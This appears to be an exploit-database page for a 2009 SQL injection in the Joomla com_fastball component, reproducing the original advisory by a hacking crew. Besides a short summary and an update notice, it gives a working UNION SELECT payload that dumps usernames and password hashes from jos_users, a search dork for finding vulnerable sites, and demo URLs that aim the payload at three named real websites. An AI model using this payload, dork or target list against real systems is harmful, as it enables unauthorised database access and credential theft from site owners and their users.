header-logo
Suggest Exploit
vendor:
Fastball
by:
kaMtiEz
7.5
CVSS
HIGH
SQL injection
89
CWE
Product Name: Fastball
Affected Version From: 1.1.2000
Affected Version To: 1.2
Patch Exists: YES
Related CWE: N/A
CPE: a:fastballproductions:fastball
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla Component com_fastball Remote SQL injection vulnerability – (league)

A remote SQL injection vulnerability exists in Joomla Component com_fastball. An attacker can exploit this vulnerability to inject malicious SQL queries in the application by sending a specially crafted HTTP request to the vulnerable parameter 'league' of the 'com_fastball' component. This can allow the attacker to gain access to the sensitive information stored in the database.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version of the application.
Source

Exploit-DB raw data:

########################################################################################################
## Joomla Component com_fastball Remote SQL injection vulnerability - (league)	      		      ##
## Author : kaMtiEz (kamzcrew@gmail.com)							      ##
## Homepage : http://www.indonesiancoder.com    	     					      ##
## Date : September 23, 2009 									      ##
########################################################################################################
# Hello My Name Is :                                                                                  ##
#  __               _____   __  ._____________                                                        ##
# |  | _______     /     \_/  |_|__\_   _____/_______                                                 ##
# |  |/ /\__  \   /  \ /  \   __\  ||    __)_\___   /                                                 ##
# |    <  / __ \_/    Y    \  | |  ||        \/    /                                                  ##
# |__|_ \(____  /\____|__  /__| |__/_______  /_____ \                                                 ##
#      \/     \/         \/                \/      \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=-        ##
########################################################################################################

[ Software Information ]

[+] Vendor : http://www.fastballproductions.com/
[+] Download : http://www.fastballproductions.com/index.php?option=com_digistore&task=list_products&id=1&Itemid=32
[+] version : 1.1.0 - 1.2
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_fastball"
[+] Location : INDONESIA
#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_fastball&league=[INDONESIANCODER]

[ Exploit ]

-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--

[ Demo ]

http://diamondblacks.com/index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--

http://sandiegoturbos.com/index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--

http://www.unibaseball.co.uk/index.php?option=com_fastball&league=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+from+jos_users--

#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,devil_nongkrong and YOU!!

[ NOTE ] 

[+] makasih buad babe and enyak .... muach ..
[+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma gue .. hahaha
[+] aurakasih napa sih lo susah banget di hubungi ?? .. hha

Navigation

Suggest Exploit

Services By CQR